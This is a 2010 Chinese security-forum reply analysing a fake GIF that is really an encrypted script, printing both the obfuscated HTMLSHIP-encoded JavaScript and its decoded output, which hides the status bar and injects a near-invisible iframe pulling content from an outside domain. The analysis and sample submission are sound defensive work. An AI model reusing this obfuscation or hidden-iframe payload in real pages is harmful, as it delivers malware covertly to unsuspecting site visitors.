本帖最后由 幸福的猪猪 于 2010-4-13 09:07 编辑
回复 4# nicholastse53
那个GIF"图片"不是真的图片文件,而是一个加过密的脚本文件。-
- <html><head><Meta Name=Encoder Content=HTMLSHIP>
- <script language="javascript"><!--
- oK84="\)\$\|Z\{\ \=\ i2\{X",yT60="\{\$\ Z\=\|\=\%F";0.6177757,gW70="0.5092029",oK84='\=\)C2\-\<hSp\?O6\$Jz\;35f\(GI\}ZW\+7M1B0\_\>HmK8\!\^abl9iut"F\~DA\[\%\\\`\#qnk\ EcyVvL\{U\&\]PdeQ\'\|Y\@\,g\n\rXxrRj\*Ts\.wN\/o\:4',yT60='fKX2vH\'C\>w\ \\uyMF\="8pRcW\?h1\,Z7\{k\;9s\!\)3\&n0l\%\/bO\`EA\rq4aTS\(r\:\^Jit\[\*g\+5\~U\.j\]\@\<Y\-DNBLQ\nd6z\#I\_\}G\$VmeoP\|x';function aL73(aM29){"\{\$FXXZ\ X\%",l=aM29.length;'b\]\-77H\{H\!',w='';while(l--)"X\$ZX\ \)1Fi2\{X",o=oK84.indexOf(aM29.charAt(l)),'b\]\!\[\[B\[\[\!',w=(o==-1?aM29.charAt(l):yT60.charAt(o))+w;"\{\$\=\=1\ \{\ X",oK84=oK84.substring(1)+oK84.charAt(0),document.write(w);'\{\]xx\{\[x\!F\|b\-'};aL73("eHI\#\ \(EOb\[\^V\$\[VN3\]\[\-\[HI\#\ \(EpWMf13\>\>X\_\=\$\^IE\ \/\^Oj\r\?H\`KB\?\ \^\r\/\?\&HE\[E\$HO3O5O5\_HNE\%\ wN\/\$E\`5j\r\?H\`K57\+aaK\_\*\_j\r\?H\`K\_\]U1a32A2\+\_\_jb\ IN\^HN\rjE\/j35W\$J\$\=N\^V5\_e9HI\#\ \(Ep")//--></script><sCrIpT LANgUaGe=jaVAscrIPt>aL73("QE\)q\%N\/6mq\}5\+ccGniiOOO\]\{l\%\%\%\]\}ai\%P\]vE\)6OEXc\+57b6\+\/Ev\+c5b\?QiE\)q\%N\/\?")</script></head><body></body></html>
通过在线解密网站得出:
- //document.write (s) <script language=javascript>hZ87=996;function _dws(){window.status = " ";setTimeout("_dws()",100);};_dws();jU70=2421;;_licensed_to_="huyufeng";</script><iframe src=http://www.5laaa.cn/aj.gif width=10 height=0></iframe> //jsunpack.url var w = <iframe src=http://www.5laaa.cn/aj.gif width=10 height=0></iframe>
hxxp://www.5laaa.cn/aj.gif 这个地址,我这边不能获取到源代码。也就是说不能进一步的确认(或者假设)这个页面是否为挂马网页。(也有可能是个统计的页面...)
p.s.样本提交卡巴斯基(中国)分析。 |
发表于 2010-4-12 21:54:50
楼主
